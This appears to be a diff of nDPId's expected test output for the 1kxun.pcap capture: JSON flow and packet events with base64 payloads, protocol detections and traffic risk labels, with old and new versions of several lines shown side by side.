00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1470104380966,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1470104380966,"pkt":"ABxCjnAxTF4M6gNlCABFAAAwAABAADAGuQcqeDOYwKhzCB+QwcnDIL+ais5pCHASFtCCkgAAAgQFtAEBBAI="}
01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":495,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104380890,"flow_last_seen":1470104380968,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":252,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1470104380968,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"42.120.51.152","src_port":49609,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"42.120.51.152","url":"42.120.51.152:8080\/api\/proxy?url=http%3A%2F%2Fvv.video.qq.com%2Fgetvinfo","code":0,"content_type":"","user_agent":"Mozilla\/5.0"}}
00621{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1470104381115,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104381115,"pkt":"AQBef\/\/6\/PiuMpcsCABFAAChLEIAAAER2QjAqANf7\/\/\/+uhMB2wAjbUvTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":507,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381217,"flow_last_seen":1470104381217,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104381217,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"224.0.0.252","src_port":56366,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1470104381217,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1470104381217,"pkt":"AQBeAAD8CJ4BzeuNCABFAAA2U68AAAERvz7AqAUl4AAA\/NwuFOsAIuU8ydMAAAABAAAAAAAACG5vdGVib29rAAD\/AAE="}
@@ -193,16 +193,16 @@
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":508,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381217,"flow_last_seen":1470104381217,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104381217,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"239.255.255.250","src_port":57325,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00621{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":508,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1470104381217,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104381217,"pkt":"AQBef\/\/6CJ4BzeuNCABFAAChFE8AAAER7zXAqAUl7\/\/\/+t\/tB2wAjbvITS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="}
00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":508,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381217,"flow_last_seen":1470104381217,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104381217,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"239.255.255.250","src_port":57325,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":509,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381237,"flow_last_seen":1470104381237,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104381237,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53623,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":509,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1470104381237,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104381237,"pkt":"ABAj4ACgYMVHBbyMCABFAABAk\/BAAEAGrRvAqAUQwKhzS9F3AbseAeEVAAAAALAC\/\/84nQAAAgQFtAEDAwUBAQgKGg8YWwAAAAAEAgAA"}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1470104381238,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104381238,"pkt":"ABxCjnAxABAj4ACgCABFAAA0AABAAEAGQRjAqHNLwKgFEAG70XdE8SFWHgHhFoASFtAl8wAAAgQFtAEBBAIBAwMH"}
00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":511,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1470104381238,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104381238,"pkt":"ABAj4ACgYMVHBbyMCABFAAAo9WxAAEAGS7fAqAUQwKhzS9F3AbseAeEWRPEhV1AQIABdlQAAcnZlcjBd"}
00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104381237,"flow_last_seen":1470104381239,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1470104381239,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53623,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01095{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":514,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104381237,"flow_last_seen":1470104381243,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":378,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1470104381243,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53623,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":509,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381237,"flow_last_seen":1470104381237,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104381237,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53623,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":509,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1470104381237,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104381237,"pkt":"ABAj4ACgYMVHBbyMCABFAABAk\/BAAEAGrRvAqAUQwKhzS9F3AbseAeEVAAAAALAC\/\/84nQAAAgQFtAEDAwUBAQgKGg8YWwAAAAAEAgAA"}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1470104381238,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104381238,"pkt":"ABxCjnAxABAj4ACgCABFAAA0AABAAEAGQRjAqHNLwKgFEAG70XdE8SFWHgHhFoASFtAl8wAAAgQFtAEBBAIBAwMH"}
00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":511,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1470104381238,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104381238,"pkt":"ABAj4ACgYMVHBbyMCABFAAAo9WxAAEAGS7fAqAUQwKhzS9F3AbseAeEWRPEhV1AQIABdlQAAcnZlcjBd"}
00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104381237,"flow_last_seen":1470104381239,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1470104381239,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53623,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01095{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":514,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104381237,"flow_last_seen":1470104381243,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":378,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1470104381243,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53623,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":539,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1470104381626,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1470104381626,"pkt":"AQBeAAD8CJ4BzeuNCABFAAA2U7AAAAERvz3AqAUl4AAA\/NwuFOsAIuU8ydMAAAABAAAAAAAACG5vdGVib29rAAD\/AAE="}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":552,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381895,"flow_last_seen":1470104381895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104381895,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.145","src_port":49612,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1470104381895,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104381895,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Ui5AAIAGjNDAqHMIt4MwkcHMAFBbXvEQAAAAAIACIAAlhwAAAgQE7AEDAwgBAQQC"}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1470104381895,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104381895,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Ui5AAIAGjNDAqHMIt4MwkcHMAFBbXvEQAAAAAIACIAAlhwAAAgQE7AEDAwgBAQQC"}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":552,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381895,"flow_last_seen":1470104381895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104381895,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.145","src_port":49612,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1470104381895,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104381895,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Ui5AAIAGjNDAqHMIt4MwkcHMAFBbXvEQAAAAAIACIAAlhwAAAgQE7AEDAwgBAQQC"}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1470104381895,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104381895,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Ui5AAIAGjNDAqHMIt4MwkcHMAFBbXvEQAAAAAIACIAAlhwAAAgQE7AEDAwgBAQQC"}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":554,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381935,"flow_last_seen":1470104381935,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104381935,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":554,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1470104381935,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1470104381935,"pkt":"AQBeAAD8uKxvwfbSCABFAAA3J0MAAAERi63AqGUh4AAA\/ORYFOsAI152CJsAAAABAAAAAAAACUpvYW5uYS1QQwAA\/wAB"}
00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":554,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381935,"flow_last_seen":1470104381935,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104381935,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
@@ -211,16 +211,16 @@
00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":555,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381935,"flow_last_seen":1470104381935,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104381935,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":556,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1470104381935,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1470104381935,"pkt":"AQBef\/\/6uKxv2MGbCABFAAClQRQAAAQRv1\/AqAUy7\/\/\/+vyiB2wAkVLKTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="}
00620{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":557,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1470104381935,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104381935,"pkt":"AQBef\/\/6SNIkYwreCABFAAChfiEAAAERhV\/AqAUp7\/\/\/+tgQB2wAjcOhTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="}
00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":558,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1470104381968,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1470104381968,"pkt":"ABxCjnAxTF4M6gNlCABFAAAsAABAADEGLge3gzCRwKhzCABQwcyPbNg5W17xEWASOQjNFQAAAgQFtAAA"}
01209{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":561,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104381895,"flow_last_seen":1470104381978,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":432,"flow_tot_l4_payload_len":432,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1470104381978,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.145","src_port":49612,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"183.131.48.145","url":"183.131.48.145\/vlive.qqvideo.tc.qq.com\/u0020mkrnds.p1203.1.mp4?vkey=7AB139BF6B32F53747E8FF192E6FE557B3A3D644C034E34BF6EAEB4E0774F2A92EF3AC5C007520BB925E5C8A18E6D302C2DAE0A295B26AA8FD1DC8069D47CE1B4A16A56870BD1ACA3E86ABE4C079659DB2182FC71217AB68CCD344CE65694457E3F53549CD617D5C9F671A26C70DC68F93F1D7BCD017762F&guid=F5EB01CC01A8E08CD83630828DE17C2B02162FD8","code":0,"content_type":"","user_agent":""}}
00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":558,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1470104381968,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1470104381968,"pkt":"ABxCjnAxTF4M6gNlCABFAAAsAABAADEGLge3gzCRwKhzCABQwcyPbNg5W17xEWASOQjNFQAAAgQFtAAA"}
01209{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":561,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104381895,"flow_last_seen":1470104381978,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":432,"flow_tot_l4_payload_len":432,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1470104381978,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.145","src_port":49612,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"183.131.48.145","url":"183.131.48.145\/vlive.qqvideo.tc.qq.com\/u0020mkrnds.p1203.1.mp4?vkey=7AB139BF6B32F53747E8FF192E6FE557B3A3D644C034E34BF6EAEB4E0774F2A92EF3AC5C007520BB925E5C8A18E6D302C2DAE0A295B26AA8FD1DC8069D47CE1B4A16A56870BD1ACA3E86ABE4C079659DB2182FC71217AB68CCD344CE65694457E3F53549CD617D5C9F671A26C70DC68F93F1D7BCD017762F&guid=F5EB01CC01A8E08CD83630828DE17C2B02162FD8","code":0,"content_type":"","user_agent":""}}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":563,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1470104382036,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1470104382036,"pkt":"AQBeAAD8uKxvwfbSCABFAAA3J0UAAAERi6vAqGUh4AAA\/ORYFOsAI152CJsAAAABAAAAAAAACUpvYW5uYS1QQwAA\/wAB"}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":564,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1470104382038,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1470104382038,"pkt":"AQBeAAD8cPGh+Cr9CABFAAA3fUUAAAERlcPAqAUJ4AAA\/ORYFOsAI76OCJsAAAABAAAAAAAACUpvYW5uYS1QQwAA\/wAB"}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":569,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382053,"flow_last_seen":1470104382053,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104382053,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
